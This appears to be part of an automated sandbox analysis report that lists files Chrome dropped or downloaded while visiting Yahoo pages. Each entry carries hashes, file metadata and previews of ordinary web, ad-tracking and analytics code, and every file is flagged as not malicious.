                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7500)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.375999578555946
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:lBm2Xzzy8qhWuwRMExuJ7Mpzzy8qktuwRMEDAfAv4OYb4oi4nv2lQ40xTpginGn:C2jeHhWxME4J7M9eHktxMEDAfAvIUknq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1AF44F01C49F7CA0B685ED5718D41D62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:73E12A991AF0E8FB81BBDE74A6BAE531E3C172E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BC7085DC1698B1DB576024E0338C51D0FC8B5C1001A84EC3ED8E4F72B76C231A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:205B8A4A5A451623C7185082B1BBA0B39A317CA8CEC1F9453E7210F05DBC1C51D6D3A158AC0FC525622723C0E22956A0150A7B2BD882F614A0BA3F4C1F2299F4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Q,e as S,b as P,p as A,d as w,f as H,j as W,i as d,q as v,O as E,L as k,k as p,l as K,a5 as U,c as j,u as V,g as C,a as N,t as q,h as L,m as X}from"./scheduler.Dsuh-FKt.js";import{S as Y,i as Z,g as O,a as g,e as R,t as h,c as y,b as $,m as x,d as ee}from"./index.CvwOawEI.js";import{V as le}from"./ViewMoreLink.Bd590k7x.js";import{t as ie}from"./commonUtil.BWwawKjd.js";const se=f=>({}),B=f=>({}),ne=f=>({}),F=f=>({});function te(f){let e,l;const i=f[14].default,s=j(i,f,f[15],null),n=s||ae();return{c(){e=S("h2"),n&&n.c(),this.h()},l(t){e=w(t,"H2",{class:!0});var o=H(e);n&&n.l(o),o.forEach(d),this.h()},h(){v(e,"class","header yf-13lpgjv"),k(e,"ellipsis",f[10])},m(t,o){p(t,e,o),n&&n.m(e,null),l=!0},p(t,o){s&&s.p&&(!l||o&32768)&&V(s,i,t,t[15],l?N(i,t[15],o,null):C(t[15]),null),(!l||o&1024)&&k(e,"ellipsis",t[10])},i(t){l||(h(n,t),l=!0)},o(t){g(n,t),l=!1},d(t){t&&d(e),n&&n.d(t)}}}function fe(f){let e,l,i;const s=f[14].default,n=j(s,f,f[15],null),t=n||re();return{c(){e=S("h3"),t&&t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):246
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.840548885243462
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:JSx/FWYTrZLiLb8yXXfQzTsh4H84vrLOAOvxK/Q/ys6vlyXbYzTsh4tAisaBfFE2:OsIrZrlUh4vflKf16vlRUh4hB1v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6501F17F68B52B1C7D8834366E4FB0B7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:76A82A2FD7CE496CE61EBEA76773F136543ACFDB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:173F8FE08C46867A95E2B607E526B91CAE9518D83F78F6BAD10CD50C888D59A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:24F080C0D22891C3FBA357B767BC333E69A0BBD751C498DD73B32105E038A286B3B3C833DD8A32A03D649AEF00C6DE1A4FE7A17F2EA26B26292AF091634C0EE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{c as s}from"./commonUtil.BWwawKjd.js";async function e(o,t){const[a]=await s(["toast"],o),n=t.id||String(Date.now());a.createToast({...t,id:n})}async function i(o,t){const[a]=await s(["toast"],o);a.removeToast(t.id)}export{e as a,i as r};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):17390
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.015034788216055
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:QfhXEuBVvfNKG6J5m3Yyc/SdruMD1fl6bl67fX762xjLqiZi:WKg1fNKG60YdwrP1fl6bq/2iZi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9A9F22821DAFDC178E53DCF500132783
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9B06D90AD63C270680CCF5404BA37A364475EAE7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9A5D6EA63C26FE7664B7AD142D3B49E17E01184D9F8F12DC084E5A7A79E4F563
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:91AF145349C894030DBDDD9899D74EF4939444E369EB85DF97A0FCB2DADAC81C76A417EC76A7BB3BE91EE24F174D060CF840C1E924FFA1735D0A29BD177FAB75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=gpt&tv=m202409240101&st=env
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"sodar_query_id":"Xt76ZsrmFJzB9u8PlbOusAo","injector_basename":"sodar2","bg_hash_basename":"gV8oOBGKSZbVoBuTsHuy49HjUHUKsGGS79HUBzhlvTM","bg_binary":"fGl9So8kLAabrxeKlepVRgDG+WS4nwnzhGSFkubq41kw+q4bRkKr+13V3W3svWgW6oV913vuVp4N/UPL+b7IgD7SeY/L0Kww9wZSp1UpYXFzNqvvSOyMO56YeS3aFYfziLYKk9otpE4FCtDCDgpbmwzhOoYQGmz7+LORXiH7bjPHvLLntmzPVKJ0vQ5kbraKMrQiUysO8JGl0q7sGMoVH9xZk7fmIYi79EX4I7SKe8gPFJ5Nc6IiyspiplNAGCWWoyjErl/46uYLeLbIvjrWKvfsf1m8rWb/QQBJoj6htCsZYE4TAEFhqEmUwyPNYkWu+0UWYbQj70okwZDWYf4+kFqPlorya2FWAkWWZZktUabUDGX11kUUto+RfLpCABYzYb2OEFAxx9elktZJkV+t419ctQm86BHI2TPw8vctjtxr632Js2eelZWbYgfTKQQOv8qu4q90eTi/DbbCtifGlEyivBE1GtmEN46W7e8ZTn4Lseg3P4BTjON9IEAv6UAT01NjewSwR86c5swar3xKgFhi389LuEcQFpcaRfqHjhCbkwNk3DLGKKi80RSBSoK0D4rkIOstedvyKC5HqZxsdk8L5tloQHSHfYjr4Debju0S1ljGUl1MJcWsFPc4husm4oJ/HatKUEaiV26tFiAzZGwPiCyTW+/PfQgGthjoeGasd16RTjE6bkCrvgwtwtFV8VsgLuXST3zNsd1P5nXhQlGbIGT3RzVGMxvYtrTxaf5HxLtO7SnIhg8d5oklSjPvsU/7EZLS/Jgq8PK7re1nM3/bWONDbL1VynM3AM8dirf3NrMVCnQCPWr0OPefQ2JVT3utEJLBdtpmQne5H
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65522), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1106395
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.813791815513695
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:pMhkvc+bDXDudn5zaBtKTgNKaSG2TYX4hKeT3w:pMhkvc+bWn5zaBtKTgNKaSG2TYKKeT3w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A9D3D0333B9FF884FDED0A9C7C999918
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B46973E0222E6E0FEB164FCDA7A3DDBFCE656D49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:94919AEB77136BECF49209B88E03882DC380A9DCD1969D5CE9A7FD775FB24181
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4251414E6653349A1F8A679F26D0A4FC6DDD1F3BBC1ACF5E8AED7180135539C929ECEE98F85BD2F153C29B0996F9D2635FE4C8F41618C1B5E90A23142C685FA0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;nordstrom;shopping;shopping","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:60ff7c91-851e-44a7-8400-9dddc9a53744;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Nordstrom;Gilmore_Girls;Charlotte_Tilbury\" ctopid=\"1878000;10610489\" hashtag=\"news;nordstrom;shopping;1878000;10610489\" rs=\"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:60ff7c91-851e-44a7-8400-9dddc9a53744;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"lifestyle","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=i-scrolled-through-18000-nordstrom-new-fall-arrivals--here-are-my-25-favorites-210216826","canonicalSite":"lifestyle","canonicalUrl":"https://www.yahoo.com/lifestyle/i-scrolled-through-18000-nordstrom-new-fall-arrivals--here-are-my-25-favorites-210216826.h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):409669
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.539370893706732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:urY1YJjIyZYEyelCoRnYYYmjOVYgYojAdYuYgjJ47YZY5j0XY6Y+j2jYSyml4DLD:ZnoZVz3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3AC2939E306909E4F1A1844800A1CD81
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:32BDD6302D0B603F3D08308FF90C7045B90F86F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1673BC31F3F97CEDE6DD438D1E26B87857D9CDB1D0D7DF4AE747251EAAA336D2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D25373A13E0F95D26150AFB657B99A09D87AD744F9FBF4C4709A16A54C71EA13D5AB511FFA9F44F196B21FD8F0A6068F97BCB9D4C9B6D2D3802B8707603CEC2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;disasters;weather;naturalphenomena;culture;natureandenvironment","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a6T00000R2KXGQA3;revsp:cnn_articles_875;lpstaid:2b2a262c-878f-3f65-9ba6-39ad37b780eb;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"North_Carolina;South_Carolina;Joe_Biden;White_House;Hurricane_Helene_%281958%29;Asheville,_North_Carolina;Florida;Infrastructure;Henderson_County,_North_Carolina;Mobile_phone_signal;Deanne_Criswell;Buncombe_County,_North_Carolina;Donald_Trump;Craig_Fugate;Kamala_Harris;Tennessee;Michelle_Coleman;National_Weather_Service\" ctopid=\"18857489;18859489;1985000;12818000;1996000\" hashtag=\"news;18857489;18859489;1985000;12818000;1996000\" rs=\"lmsid:a0a6T00000R2KXGQA3;revsp:cnn_articles_875;lpstaid:2b2a262c-878f-3f65-9ba6-39ad37b780eb;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"news","enabled":true,"pos":
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://sb.scorecardresearch.com/p2?c1=2&c2=7241469&c5=2023538075&c7=https%3A%2F%2Fwww.yahoo.com%2F&c14=-1&c8=Yahoo%20%7C%20Mail%2C%20Weather%2C%20Search%2C%20Politics%2C%20News%2C%20Finance%2C%20Sports%20%26%20Videos&c9=https%3A%2F%2Fhfj.rontishet.ru%2F&gdpr=0&gdpr_consent=&cs_ucfr=1&cs_fpdm=*null&cs_fpdt=*null&cs_fpid=ktb74Qf%2BB5a5JQqJGS%2Fbp0PG1iIU%2BWKGDEPE8YdWnT4%3D&cs_fpit=c&ns_c=UTF-8&ns__t=1727716870229
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (788)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.34006332637445
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:OJKGJND4kQ9dSO6E+sl1XSDQkQSYRSYWu6jlqDq:atp4r3OEjl1iUkQ/R9r6jkDq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3064FD915108C4936EA6E13DE4AEDBA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7E3D1EF062A1B0A5E2A17987A1230FBC7FED7899
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:416D515D143CA4553B9D03A5CE9B0834981DF94B4AA52DD2918AD6F743020543
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1A33E729CA863424986C59284A1533D3092A1E4A7CE1F8BC46837C9E3B6BADF97CA97E68C8D11CB41C371859FE7C79B096D3BE7EA0A06E7375044DB4600125D2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/index.CwoOB1cS.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{a2 as x,a3 as f}from"./scheduler.Dsuh-FKt.js";function h(t){const r=t-1;return r*r*r+1}function v(t){return t/=.5,t<1?.5*t*t:(t--,-.5*(t*(t-2)-1))}function F(t,{delay:r=0,duration:p=400,easing:c=x}={}){const s=+getComputedStyle(t).opacity;return{delay:r,duration:p,easing:c,css:a=>`opacity: ${a*s}`}}function w(t,{delay:r=0,duration:p=400,easing:c=h,x:s=0,y:a=0,opacity:l=0}={}){const i=getComputedStyle(t),d=+i.opacity,n=i.transform==="none"?"":i.transform,e=d*(1-l),[u,y]=f(s),[_,m]=f(a);return{delay:r,duration:p,easing:c,css:($,g)=>`....transform: ${n} translate(${(1-$)*u}${y}, ${(1-$)*_}${m});....opacity: ${d-e*g}`}}function C(t,{delay:r=0,duration:p=400,easing:c=h,axis:s="y"}={}){const a=getComputedStyle(t),l=+a.opacity,i=s==="y"?"height":"width",d=parseFloat(a[i]),n=s==="y"?["top","bottom"]:["left","right"],e=n.map(o=>`${o[0].toUpperCase()}${o.slice(1)}`),u=parseFloat(a[`padding${e[0]}`]),y=parseFloat(a[`padding${e[1]}`]),_=parseFloat(a[`margin${e[0]}`]),m=parseFloat(a[`margin$
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YHAXW2Vn:YglVn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:97EFE0B7EE61E154D57E80758BB797D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:810B4E115FE9F5AE697666FEBF2A9ABF0B21C9EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EFABBA3678B85FCAB831B778EA2DDAAD1E2A1E952584D3566BC39B7CCB3429D9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AA02209CF80FC2564CE0DB0BF9F30241E92EA33101B55FFE5E26D617F90B74277AE68D714A7B00C792EF2B88B582E3F299213A5C3C9BF9AFE6C6C1800FC276AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://rp.liadm.com/j?dtstmp=1727716923634&did=did-004f&se=e30&duid=05c3ae107b3d--01j91z85qjx8j5h38a4w43km0c&tv=8.51.0&pu=https%3A%2F%2Ffinance.yahoo.com%2Fsectors%2Fbasic-materials%2F&us_privacy=1YNN&wpn=prebid&gdpr=0&gpp_s=DBAA&gpp_as=-1&cd=.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"bakers":[]}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?&p=156423&us_privacy=&predirect=https%3A%2F%2Fevents-ssc.33across.com%2Fmatch%3Fliv%3Dh%26us_privacy%3D%26bidder_id%3D25%26external_user_id%3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, was "initial-bundle.js", last modified: Thu Jun 27 09:13:17 2024, from Unix, original size modulo 2^32 31106
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):10464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.981060781218377
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:U6Ejz+QWmHIzysN5jwT/i0+hfLYUBh7NHNgShEvO3WOY9xtCbA:UNIHpN5jwIhfsUBGGEvOLY9z2A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A3F309176CB54120DF00F4F93D9D9C54
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D62A660AB7EABD8E92E0BA713A9B242631394501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D2E3D1E78866F6BC5FF5D7C4D6C6937F4497BF6EF538C4D91390B289E93522E7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EBD91D02D8EDB4B03567106A63AD6A315FEE43164AED5FE95EAC516108E58712798E791D3F38D7E602528E0235015B33FDD126CEDFCECA534C787D1D16609586
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:....--}f..initial-bundle.js..[.w.6..+2ONB&.-.m....8..q..t...L....T...J..w.._"e...=7'qHp0...3..`3......7.=...m?.q.L..7g....')..n.g.xbv.;...Yl.m..S.J..]..6b..Cat.....}:......F......i|..yH.....9u6Z....w.y...9.:#.U..5.SX..H]a.N)...3g.......O&..S.C_.<...;^.b.....KF.......Pd?.B..-.b.1...2\.H.....v.....:..vH.XL..kN.....uM.R...uc4......6.....F........V.D6W....r..:.L..z.}.S~.Nk.y..~.>}Z..[.a.|Jkgv.E.=....v..E.e.2.o..4.m...z....V.D......C..X.iY%...%..$..OA,...M.....`*gpz...[......aqa.&u..E..p<.|~...7..}......ax..1,.0H......n....r.=.A|%...z:........._5...8.......~2...J.rg1...9..=..'....F.X.au2....lo6..?AE.,...*k...a=`..'XG~..-...h..#..MG <....:\......$..`.J.'Jo."........I.Z.,...Y.fP......<1.HJ......zCq...:..N.L.G...}..W...Y\t.q.......?..SzeJ.....u..".of.h.o.RJsI......T..@.V.}'...7o,....w.V.....x......./]..)}s.=.9.k..7.t..l.<..)...k..`.g...Qir.u.....:....'<7._.4z......-..:4. ....i..l3. SpJj$..3.\.E.!...E.......TJ....NqB.El...u.G.+...)(....3L....HU.R..a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (60378), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):60378
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.226751934675976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:DwUHzI01OwxqmIGAKoMuXpTteneKJ4jf0V:DHXm50j
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C1FBB54C4F22838F40CE99E7418FCD97
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:62D8945137AE75C185903E0552C920E03E5577E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C17C2FCA2732465B44F96FE2E566A4E016E4A56D7C40169E5E84F501BA750E5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C5178DF676E1BD912502AC86DE7E270B76FD321B229E320754E455AD6620FCEDCFED5515AA9192ECA09074E892916978E0A3F412C6C8757AEC88900566C56B48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
